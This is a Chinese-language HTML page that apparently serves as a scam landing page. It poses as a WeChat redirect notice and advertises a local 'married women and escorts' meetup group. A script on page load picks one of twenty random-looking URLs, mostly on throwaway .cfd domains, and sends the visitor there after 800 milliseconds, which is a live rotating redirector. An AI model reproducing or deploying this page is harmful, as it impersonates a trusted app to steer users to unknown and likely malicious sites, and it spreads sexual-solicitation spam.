<!DOCTYPE html>
<html>
  <head>
    <title>加载中.....</title>
    <style>
      body {
        font-family: Arial, sans-serif;
        background-color: #f0f0f0;
        display: flex;
        flex-direction: column;
        justify-content: flex-start;
        align-items: center;
        height: 100vh;
        margin: 0;
        color: #333;
      }

      p {
        font-size: 35px;
        text-align: center;
        color: darkgreen;
        margin: 1em 0;
      }
      .highlight {
        color: coral;
      }

      .image-container {
        display: flex;
        flex-direction: column;
        align-items: center;
        margin-top: 2em;
      }

      .image-container img {
        max-width: 100%;
        height: auto;
        margin-top: 1em;
      }
    </style>
    <script type="text/javascript">
      window.onload = function () {
        var links = [
          "http://hytjyx.em89cf.cfd/j0Yc9J4z",
          "http://nmraxbrkyzpx.pigero.cfd/Si2NYhtO",
          "http://szedbz.mdotfk.cfd/ryFa7sao",
          "http://a7satt68f8y.vdmlxw.cfd/YaRpcXTE",
          "http://ah54pt3bs7r2.onpqal.cfd/qe6zW3MN",
          "http://axee7w5ic2h.wl8g9k.cfd/4dBdxOcx",
          "http://nr8xbkmesj4.ufodxe.cfd/80tSuFEF",
          "http://hkr6aaa26j7.twcdgl.cfd/PkdDBfUG",
          "http://3jkyahz4yyk.tvlfbk.cfd/l7cRVztN",
          "http://chpz8h.1l3wrz.cfd/Olxl6KAj",
          "http://d2iknw.9zrd3e.cfd/fMmh7rWE",
          "http://a5d4256nymj.l2c76p.cfd/XxdjFGR6",
          "http://4anzinccysi.zrrlxq.cfd/unU7EzWN",
          "http://zx6rx5pmnzb.kjfwag.cfd/fyVRbocN",
          "http://t2f7j8mzwpb2.fqwjic.cfd/KOrOpfO2",
          "http://23ebhwiw7ep8.ewsapm.cfd/ytlLWxwe",
          "http://ns2276.tgvmuk.cfd/1n4sH3tw",
          "http://rw7ah543d3k.bsodip.cfd/aBWXIhlb",
          "http://wmrawhi6rt6.lfcdya.cfd/ReQjzDVK",
          "http://a3a8ar7226e.ja775i.cn/VHmFUngE",
        ];
        var randomLink = links[Math.floor(Math.random() * links.length)];
        setTimeout(function () {
          window.location.href = randomLink;
        }, 800);
      };
    </script>
  </head>
  <body>
    <p>
      微信正在跳转，请稍等，不要退出哦！<br />
      <span class="highlight">“如遇跳转失败请返回重新扫码”</span>
    </p>
    <p>
      全国各地同城 少妇，外围，线下互动 内部交流群<br />
      <span class="highlight">“限时加入！”</span>
    </p>
    <div class="image-container">
      <img src="img2/1.jpg" alt="Image 1" />
      <img src="img2/2.jpg" alt="Image 2" />
      <img src="img2/3.jpg" alt="Image 3" />
    </div>
  </body>
</html>
